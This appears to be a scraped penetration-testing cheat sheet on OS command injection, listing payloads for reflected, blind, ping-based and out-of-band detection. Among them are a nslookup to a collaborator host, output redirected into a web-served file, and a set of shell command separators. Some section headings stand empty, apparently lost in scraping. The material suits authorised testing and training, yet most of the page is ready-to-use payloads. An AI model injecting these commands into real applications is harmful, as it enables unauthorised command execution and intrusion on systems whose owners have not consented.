Exploitation
Do not forget to use urlencoding
Reflected
& echo test123 &Blind
& ping -c 10 127.0.0.1 &Blind (ping rce listener)
Kali:
tcpdump -i <NETWORK_CARD> icmpVictim:
& ping <KALI_IP> &BLIND OAST
& nslookup collaborator-link.net &Blind redirecting the input
& whoami > /var/www/static/whoami.txt &Command seperators
Copy
&
&&
|
||More command seperators
Copy
Inline Command Execution (Linux)
Copy
Check if command is executed via cmd or powershell
Copy
Last updated